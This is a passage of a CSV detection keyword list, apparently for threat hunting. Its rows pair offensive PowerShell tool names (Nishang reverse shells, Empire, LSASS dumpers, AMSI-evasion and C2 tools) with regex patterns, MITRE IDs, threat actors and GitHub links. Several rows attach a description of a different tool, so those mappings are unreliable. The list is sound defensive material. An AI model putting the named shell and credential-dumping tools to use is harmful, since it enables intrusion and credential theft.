Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","49309" "*Invoke-PoshRatHttps*",".{0,1000}Invoke\-PoshRatHttps.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","49310" "*Invoke-PostDump*",".{0,1000}Invoke\-PostDump.{0,1000}","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection","T1003","TA0006","N/A","Black Basta","Credential Access","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49311" "*Invoke-PostExfil*",".{0,1000}Invoke\-PostExfil.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Invoke-PostExfil.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49312" "*Invoke-PowerDump*",".{0,1000}Invoke\-PowerDump.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","BlackCat - Scattered Spider*","C2","https://github.com/Arno0x/DBC2","1","1","N/A","N/A","10","10","295","86","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z","49313" 
"*Invoke-PowerDump*",".{0,1000}Invoke\-PowerDump.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49314" "*Invoke-PowerDump*",".{0,1000}Invoke\-PowerDump.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - 
T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","49315" "*Invoke-PowerDump.ps1*",".{0,1000}Invoke\-PowerDump\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49316" "*Invoke-PowerExtract*",".{0,1000}Invoke\-PowerExtract.{0,1000}","offensive_tool_keyword","powerextract","This tool is able to parse memory dumps of the LSASS process without any additional tools (e.g. 
Debuggers) or additional sideloading of mimikatz. It is a pure PowerShell implementation for parsing and extracting secrets (LSA / MSV and Kerberos) of the LSASS process","T1003 - T1055 - T1003.001 - T1055.012","TA0007 - TA0002","N/A","N/A","Credential Access","https://github.com/powerseb/PowerExtract","1","1","N/A","N/A","N/A","2","117","14","2025-03-28T10:49:43Z","2021-12-11T15:24:44Z","49317" "*Invoke-PowerIncrease -SourceFilePath *",".{0,1000}Invoke\-PowerIncrease\s\-SourceFilePath\s.{0,1000}","offensive_tool_keyword","Invoke-PowerIncrease","binary padding to add junk data and change the on-disk representation of a file","T1480 - T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/The-Viper-One/Invoke-PowerIncrease","1","0","N/A","N/A","8","1","3","0","2024-08-01T18:10:02Z","2024-07-18T17:40:26Z","49318" "*Invoke-PowerIncrease.ps1*",".{0,1000}Invoke\-PowerIncrease\.ps1.{0,1000}","offensive_tool_keyword","Invoke-PowerIncrease","binary padding to add junk data and change the on-disk representation of a file","T1480 - T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/The-Viper-One/Invoke-PowerIncrease","1","1","N/A","N/A","8","1","3","0","2024-08-01T18:10:02Z","2024-07-18T17:40:26Z","49319" "*Invoke-PowerOptionsWMI*",".{0,1000}Invoke\-PowerOptionsWMI.{0,1000}","offensive_tool_keyword","WMImplant","WMImplant is a PowerShell based tool that leverages WMI to both perform actions against targeted machines. but also as the C2 channel for issuing commands and receiving results. 
WMImplant will likely require local administrator permissions on the targeted machine.","T1021 - T1059 - T1047 - T1057 - T1049","TA0002 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/FortyNorthSecurity/WMImplant","1","0","N/A","N/A","N/A","10","813","146","2024-06-25T12:02:26Z","2016-05-24T14:00:14Z","49320" "*Invoke-PowerShellHistoryCheck*",".{0,1000}Invoke\-PowerShellHistoryCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","49321" "*Invoke-PowerShellIcmp*",".{0,1000}Invoke\-PowerShellIcmp.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","49322" "*Invoke-PowerShellIcmp.ps1*",".{0,1000}Invoke\-PowerShellIcmp\.ps1.{0,1000}","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","N/A","10","10","1493","252","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z","49323" "*Invoke-PowerShellIcmp.ps1*",".{0,1000}Invoke\-PowerShellIcmp\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. 
Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","49324" "*Invoke-PowerShellTcp*",".{0,1000}Invoke\-PowerShellTcp.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","49325" "*Invoke-PowerShellTcp*",".{0,1000}Invoke\-PowerShellTcp.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","49326" "*Invoke-PowerShellTcp.ps1*",".{0,1000}Invoke\-PowerShellTcp\.ps1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","49327" "*Invoke-PowerShellTcp.ps1*",".{0,1000}Invoke\-PowerShellTcp\.ps1.{0,1000}","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","N/A","10","10","1493","252","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z","49328" "*Invoke-PowerShellTcp.ps1*",".{0,1000}Invoke\-PowerShellTcp\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. 
Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","49329" "*Invoke-PowerShellTcpOneLine*",".{0,1000}Invoke\-PowerShellTcpOneLine.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","49330" "*Invoke-PowerShellTcpOneLine*",".{0,1000}Invoke\-PowerShellTcpOneLine.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. 
Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","49331" "*Invoke-PowerShellTcpOneLine.ps1*",".{0,1000}Invoke\-PowerShellTcpOneLine\.ps1.{0,1000}","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","N/A","10","10","1493","252","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z","49332" "*Invoke-PowerShellTcpOneLine.ps1*",".{0,1000}Invoke\-PowerShellTcpOneLine\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","49333" "*Invoke-PowerShellTcpOneLine.ps1*",".{0,1000}Invoke\-PowerShellTcpOneLine\.ps1.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an “all in one”
Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","1","N/A","N/A","N/A","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","49334" "*Invoke-PowerShellTcpOneLineBind*",".{0,1000}Invoke\-PowerShellTcpOneLineBind.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","49335" "*Invoke-PowerShellTcpOneLineBind.ps1*",".{0,1000}Invoke\-PowerShellTcpOneLineBind\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. 
Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","49336" "*Invoke-PowershellTranscriptionCheck*",".{0,1000}Invoke\-PowershellTranscriptionCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","49337" "*Invoke-PowerShellUdp*",".{0,1000}Invoke\-PowerShellUdp.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","49338" "*Invoke-PowerShellUdp.ps1*",".{0,1000}Invoke\-PowerShellUdp\.ps1.{0,1000}","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","N/A","10","10","1493","252","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z","49339" "*Invoke-PowerShellUdp.ps1*",".{0,1000}Invoke\-PowerShellUdp\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","49340" "*Invoke-PowerShellUdpOneLine*",".{0,1000}Invoke\-PowerShellUdpOneLine.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","49341" "*Invoke-PowerShellUdpOneLine.ps1*",".{0,1000}Invoke\-PowerShellUdpOneLine\.ps1.{0,1000}","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","N/A","10","10","1493","252","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z","49342" "*Invoke-PowerShellUdpOneLine.ps1*",".{0,1000}Invoke\-PowerShellUdpOneLine\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","49343" "*Invoke-PowerShellWmi*",".{0,1000}Invoke\-PowerShellWmi.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","49344" "*Invoke-PowerShellWmi.ps1*",".{0,1000}Invoke\-PowerShellWmi\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","49345" "*Invoke-PowerThIEf*",".{0,1000}Invoke\-PowerThIEf.{0,1000}","offensive_tool_keyword","Invoke-PowerThIEf","An IE Post Exploitation Library released at Steelcon in Sheffield 7th July 2018.","T1027 - T1053 - T1114 - T1059 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Credential Access","https://github.com/nettitude/Invoke-PowerThIEf","1","0","N/A","N/A","N/A","2","130","29","2025-02-27T23:17:17Z","2018-07-10T09:14:58Z","49346" "*Invoke-PowerThIEf*",".{0,1000}Invoke\-PowerThIEf.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","49347" "*Invoke-PowerThIEf.ps1*",".{0,1000}Invoke\-PowerThIEf\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a 
Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","49348" "*Invoke-PPLDump*",".{0,1000}Invoke\-PPLDump.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49349" "*Invoke-Prasadhak*",".{0,1000}Invoke\-Prasadhak.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","49350" "*Invoke-Prasadhak.ps1*",".{0,1000}Invoke\-Prasadhak\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. 
Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","49351" "*Invoke-Pre2kSpray*",".{0,1000}Invoke\-Pre2kSpray.{0,1000}","offensive_tool_keyword","Invoke-Pre2kSpray","Enumerate domain machine accounts and perform pre2k password spraying.","T1087.002 - T1110.003","TA0007 - TA0006","N/A","N/A","Credential Access","https://github.com/eversinc33/Invoke-Pre2kSpray","1","1","N/A","N/A","8","1","69","11","2023-07-14T06:50:22Z","2023-07-05T10:07:38Z","49352" "*Invoke-PrintDemon*",".{0,1000}Invoke\-PrintDemon.{0,1000}","offensive_tool_keyword","Invoke-PrintDemon","This is an PowerShell Empire launcher PoC using PrintDemon and Faxhell. The module has the Faxhell DLL already embedded which leverages CVE-2020-1048 for privilege escalation. 
The vulnerability allows an unprivileged user to gain system-level privileges and is based on @ionescu007 PoC.","T1204 - T1208 - T1216 - T1055 - T1203","TA0001 - TA0007 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/BC-SECURITY/Invoke-PrintDemon","1","1","N/A","N/A","N/A","3","201","38","2020-10-17T17:04:24Z","2020-05-15T05:14:49Z","49353" "*Invoke-PrintDemon.ps1*",".{0,1000}Invoke\-PrintDemon\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49354" 
